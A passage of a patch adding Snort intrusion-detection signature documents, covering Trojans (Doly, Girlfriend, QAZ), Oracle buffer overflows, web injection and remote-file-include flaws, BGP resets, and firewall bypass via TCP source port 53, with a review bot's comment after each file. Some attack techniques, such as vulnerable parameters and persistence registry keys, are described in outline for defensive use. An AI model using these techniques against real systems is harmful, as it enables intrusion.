+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+
+Registry keys added are:
+
+	StartIE=C:\WINDOWS\notepad.exe qazwsx.hsq
+
+This will start the Trojan each time notepad is executed.
+
+Look for the existence of the file note.com. The file notepad.exe may have been replaced with a Trojaned version that is approximately 120 kb in size (the original is 52 kb).
+
+A machine reboot is required to clear the existing process from running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS501
+http://www.whitehats.com/info/IDS498
+http://www.whitehats.com/info/IDS499
+
+McAfee
+http://vil.nai.com/vil/content/v_98775.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.qaz.a.html
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/qaz.htm
+
+--
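Review bot: the registry key "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run" contains a space in "Current Version"; the key is CurrentVersion, as 1981.txt in this patch writes it. "exceutable" should be "executable" and "QAZ sever" should be "QAZ server". The SID table lists 108, 731, 775, 733 out of order, and sid 775 is not otherwise mentioned; sort the rows and check that each sid has its own file.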
--- /dev/null
+++ b/doc/signatures/2601.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2601
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_master_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck87.html
+
+--
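Review bot: the sentence about $ORACLE_PORTS in Detailed Information (the "If you are running Oracle on a Windows server" paragraph) is a deployment instruction, not a description of the vulnerability; it should say that $ORACLE_PORTS is the port variable the rule is written against and why Windows installs need it set to "any", and it belongs under Corrective Action or a configuration note rather than between the description of the overflow and the affected systems. Also fix "a Oracle database" to "an Oracle database" in the Summary, and the Additional References entry labelled "Other:" would be clearer with a vendor advisory alongside the AppSecInc policy check if one is available.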
--- /dev/null
+++ b/doc/signatures/119.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+119
+
+--
+Summary:
+Doly is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine. Later versions are capable of launching DDoS attacks.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes changes to the system registry, Win.ini and System.ini. When first executed the Trojan replicates itself and in most cases, gives the copy a random name. This Trojan may use the file extensions ".exe" or ".dll".
+
+The Trojan changes system startup files and registry settings to add the Doly sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	119	Doly 2.0 access (outgoing TCP connection)
+	1985	Doly 1.5 server response (outgoing TCP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CLASSES_ROOT\exefile\shell\open\command
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunServices
+	HKEY_LOCAL_MACHINE\Hardware\Data
+	HKEY_LOCAL_MACHINE\Hardware\Enum
+	HKEY_LOCAL_MACHINE\Software\Microsoft\DirectXMedia
+
+Registry keys added are:
+
+	HKEY_CLASSES_ROOT\.dl
+
+Removal of the replicant is also required, look for files ending in ".exe" or ".dll" in the <drive>:\Windows\ or <drive>:\Windows\System\ folders that use alphanumeric file names. The name of the replicant may be in one of the registry keys above.
+
+A machine reboot is required to clear the existing process from running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS312
+
+Hackfix
+http://www.hackfix.org/miscfix/doly.shtml
+
+Dark-e Trojan Archive
+http://www.dark-e.com/archive/trojans/doly/index.html
+
+--
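Review bot: the registry paths under Corrective Action are spelled "Current Version" with a space; the actual key is "CurrentVersion" (as the 145.txt file in this same patch writes it), and an administrator searching the registry for the spaced form will not find it. Typos to fix: "exceutable" and "Doly sever" in Detailed Information. This file also lacks the "Affected Systems:" section that every other signature file in the patch carries; the operating-system list in Detailed Information would fit there.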
--- /dev/null
+++ b/doc/signatures/100000514.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000514
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "SAPHPLesson" application running on a webserver. Access 
+to the file "misc.php" with SQL commands being passed as the "action" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "action" parameter in the "misc.php" script used by the 
+"SAPHPLesson" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SAPHPLesson
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
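Review bot: the third paragraph of Detailed Information (starting "This event is generated when an attempt is made to gain unauthorized access to a CGI application") is generic credential-validation boilerplate that does not match an SQL injection rule and partly contradicts the first paragraph; drop it or rewrite it around the "action" parameter of "misc.php". Also "running ona web server" should read "on a web server", "attackers choosing" should be "attacker's choosing", and "an exploitation attempt has been attempted" in the Summary is redundant. Style: the "--" separators after the Sid, Affected Systems and Contributors blocks are missing the blank line the other files use.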
--- /dev/null
+++ b/doc/signatures/2523.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2523
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Transmission Control Protocol (TCP) used in Border
+Gateway Protocol (BGP).
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+The Border Gateway Protocol uses TCP to maintain sessions when handling
+DNS queries. A vulnerability in the core implementation of TCP may make
+it possible for an attacker to reset a number of connections and cause a
+Denial of Service (DoS) to occur.
+
+The attack is possible because the listening service will accept a TCP
+sequence number within a range of what is expected in an established
+session. Since BGP relies on an established TCP session state, guessing
+a suitable sequence number to reset connections is feasible.
+
+--
+Affected Systems:
+	Various implementations of TCP by multiple vendors
+
+--
+Attack Scenarios:
+An attcker needs to send a specially crafted packet to reset a
+connection.
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
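Review bot: the first sentence of Detailed Information is wrong: BGP does not handle DNS queries; it uses a long-lived TCP session (port 179) to exchange routing information between peers, which is exactly why a spoofed RST that lands inside the receive window is disruptive. Rewrite it as "The Border Gateway Protocol uses long-lived TCP sessions to exchange routing information between peers." Fix "attcker" in Attack Scenarios, and Additional References is empty even though Corrective Action tells the reader to apply vendor patches; link the vendor or CERT advisory this rule was written from.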
--- /dev/null
+++ b/doc/signatures/1606.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1606
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
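Review bot: the Summary and Detailed Information never name the CGI application or the parameter the rule matches on, so an analyst cannot tell from this document what triggered the alert or what to patch; state the script name and the condition that fires the rule, and fill in Affected Systems and Additional References accordingly. Typos: "running ona web server" should be "on a web server", and "attackers choosing" should be "attacker's choosing".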
--- /dev/null
+++ b/doc/signatures/145.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+145
+
+--
+Summary:
+Girlfriend is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes changes to the system registry. When first executed the Trojan replicates itself and in most cases, gives the copy the name Windll.exe. This file is located in the <drive>:\windows\ directory.
+
+The Trojan server opens port 21554 by default. This port may be changed by the attacker's client after initial connection.
+
+	SID	Message
+	---	-------
+	145	GirlFriendaccess
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+
+Registry keys added:
+
+	Windll.exe
+
+Removal of the file Windll.exe is required. Also end the process Windll.exe.
+
+A machine reboot may be required to clear the existing process from running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS98
+
+Dark-e
+http://www.dark-e.com/archive/trojans/girl/135/index.shtml
+
+NTSecurity.net
+http://www.ntsecurity.net/Panda/Index.cfm?FuseAction=Virus&VirusID=400
+
+--
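Review bot: under Corrective Action, "Registry keys added:" lists "Windll.exe", which is a file name (and presumably the value written under the Run key above), not a registry key; reword it as the Run value that points at Windll.exe so readers remove the right thing. In the SID/Message table "GirlFriendaccess" is missing a space ("GirlFriend access"), and "exceutable" in Detailed Information should be "executable".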
--- /dev/null
+++ b/doc/signatures/2115.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+2115
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability in the Mike Bobbit Album.pl cgi application.
+
+--
+Impact:
+Execution of arbitrary code with the privileges of the user executing the cgi application.
+
+--
+Detailed Information:
+The MIke Bobbit Album is a Perl CGI script used for managing pictures on a webserver.
+
+A vulnerability exists such that an attacker may execute arbitrary commands on the server when a non-standard configuration file is used.
+
+Affected Systems:
+	Mike Bobbit Album 0.61.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7444
+
+--
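Review bot: "Attack Scenarios:" contains only "Simple.", which is the Ease of Attack text copied over; it should describe how the non-standard configuration file mentioned in Detailed Information leads to command execution. The "--" separator before "Affected Systems:" is missing, breaking the section structure every other file follows. Also "MIke Bobbit" should be "Mike Bobbit".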
--- /dev/null
+++ b/doc/signatures/1789.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 1789
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+IRC Protocol
+http://www.irchelp.org/irchelp/rfc/
+
+--
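Review bot: "Sid: 1789" is written on one line while every other file in the patch puts the number on its own line; keep the layout consistent so tooling that parses these files behaves the same. This file has no "Affected Systems:" section. Fix "unkown" to "unknown" in Impact.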
--- /dev/null
+++ b/doc/signatures/504.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+504
+
+--
+Summary:
+This event is generated when possible non-legitimate traffic is detected
+that should not be allowed through a firewall.
+
+--
+Impact:
+This can be used to pass through a poorly configured firewall.
+
+--
+Detailed Information:
+
+Traffic from TCP port 53 is used by DNS servers for zone transfers.  
+Normal DNS traffic uses the UDP protocol.  An attacker could use a TCP 
+source port of 53 to pass through a poorly configured firewall.  DNS 
+traffic from port 53 using either UDP or TCP should be to a port above 
+1023.  Ports 1023 and below are privileged.
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+An attacker could use a source port of 53 for TCP connections to bypass 
+a poorly configured firewall.  
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Incoming connections from TCP port 53 should only be allowed to machines
+that need the ability to do zone tranfers.  
+
+Connections from TCP port 53 should only be allowed to ports >=1024 on 
+these machines.  
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS07
+
+--
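Review bot: Detailed Information overstates the case: TCP port 53 is not only used for zone transfers; resolvers fall back to TCP whenever a response is too large for UDP (truncated response with the TC bit set), so "Normal DNS traffic uses the UDP protocol" should be qualified, and the Corrective Action advice to allow TCP/53 connections only to zone-transfer hosts can break legitimate resolution for large responses. Say that responses to client queries are legitimate over TCP as well and that the rule targets TCP connections whose source port is 53, as the Attack Scenarios paragraph correctly describes. Typo: "tranfers" in Corrective Action; also trailing whitespace on "Rule:" and on the "-- " separator before Additional References.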
--- /dev/null
+++ b/doc/signatures/505.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+SID:
+505
+
+--
+Summary:
+This event is generated when an attempt is made to login to a Timbuktu server using an unencrypted link.
+
+--
+Impact:
+Serious. Unauthorized access to the server.
+
+--
+Detailed information:
+Looks at the initial hex code of a Timbuktu client login and captures the login and password  combination. 
+
+This is a poor security practice over the open internet and on untrusted network links. This is a  Timbuktu login going over plaintext to the Timbuktu server.
+
+That means that anyone sniffing the wire can now use the login and password used to gain access to  the Timbuktu server.
+
+--
+Affected Systems:
+	Windows all versions
+	Mac OS 7.5.3 and later
+
+--
+Attack Scenario:
+An attacker can use a sniffer to gain the user login credentials and use the information to gain unauthorized access to the machine.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+Timbuktu may use a port other than 1417 
+
+--
+Corrective Action:
+Use Timbuktu over encrypted links or only on local LANs
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Jake Babbin 
+
+--
+References: 
+
+Arachnids:
+arachnids 229 
+
+--
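Review bot: the first sentence of Detailed Information says the rule "captures the login and password combination", which describes the rule as harvesting credentials; it matches on the initial bytes of the Timbuktu login exchange, so reword it to say the rule matches the start of a plaintext login so that the credentials in the same packet are exposed to anyone sniffing the link. Section headers are inconsistent with the rest of the patch: "SID:" vs "Sid:", "Detailed information" vs "Detailed Information", "Attack Scenario" vs "Attack Scenarios", and "References:" vs "Additional References:". The reference "arachnids 229" should be a URL like the other files' Arachnids entries, and the double spaces in the prose should be single.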
--- /dev/null
+++ b/doc/signatures/1241.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1241
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
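Review bot: "Affected Systems:" and "Additional References:" are both empty, and the Summary is generic, so nothing in this document tells an analyst which server or application the rule matches; the Attack Scenarios paragraph mentions an ftp root directory, which suggests the rule targets an FTP server, and that should be stated in Summary and Affected Systems. Trailing whitespace on "Rule:" and on the "-- " separator.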
--- /dev/null
+++ b/doc/signatures/375.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+375
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Linux or Berkeley Systems Development (BSD) host running the reconnaissance tool SING.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a host running Linux or BSD using the SING reconnaissance tool contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Ofir Arkin < ofir@sys-security.com> 
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS447
+
+--
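Review bot: "Berkeley Systems Development (BSD)" in the Summary is wrong; BSD stands for Berkeley Software Distribution. Fix "legimately" to "legitimately" in False Positives, and remove the stray space in "< ofir@sys-security.com>" in Contributors. The Corrective Action "Block inbound ICMP echo requests" is a blanket recommendation; qualify it as blocking echo requests from untrusted networks at the perimeter, since the False Positives section itself notes that echo requests are used for legitimate troubleshooting.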
--- /dev/null
+++ b/doc/signatures/100000594.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000594
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "index.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "index.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
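Review bot: the Attack Scenarios paragraph ("An attacker can access an authentication mechanism and supply his/her own credentials") and the third paragraph of Detailed Information are credential-checking boilerplate and do not describe a remote file include; rewrite both around the "admin_template_path" parameter of "index.php" being pointed at a remote file, which is what the Summary says the rule detects. Also "running ona web server" should be "on a web server", "attackers choosing" should be "attacker's choosing", the Summary's "exploitation attempt has been attempted" is redundant, and Additional References is empty. The "--" separators after Sid, Affected Systems and Contributors lack the blank line used elsewhere.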
--- /dev/null
+++ b/doc/signatures/1699.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+1699
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This may be against corporate policy. p2p clients connect to other p2p clients to share files, commonly music and video files but can be configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to transfer company confidential information to unauthorized hosts external to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Any HTTP GET request to a port associated with a p2p application may generate a false positive event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2815.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2815
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure begin_flavor_definition
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
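Review bot: the third paragraph of Detailed Information is broken by a template artifact: the procedure name "begin_flavor_definition" ends one line and the following line begins with ". This procedure is included in", leaving a stray line break before the period; join it into "vulnerability in the procedure begin_flavor_definition. This procedure is included in sys.dbms_repcat_fla." "Oracle Oracle9i" under Affected Systems duplicates the vendor name. Several section separators and headers ("-- ", "Rule: ", "Sid: ") carry trailing whitespace, and Additional References is empty although Corrective Action points at a vendor patch.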
--- /dev/null
+++ b/doc/signatures/111-12.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-12
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a scan is in progress. In this case, indications are that the tool nmap
+is being use to determine the operating system of the target host.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
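Review bot: "is being use to determine" in Detailed Information should read "is being used to determine". Since the Sid is given as "111-12" (a preprocessor generator and event id rather than a plain rule sid), the Summary should say this is a stream4 preprocessor event and, as the other files do, state what the preprocessor saw (the TCP flag combination or option usage that nmap's OS fingerprinting produces) so an analyst can confirm the alert from packet data. Trailing whitespace on the "-- " separators and on "Rule: " and "Sid: ".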
--- /dev/null
+++ b/doc/signatures/100000474.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000474
+--
+Summary:
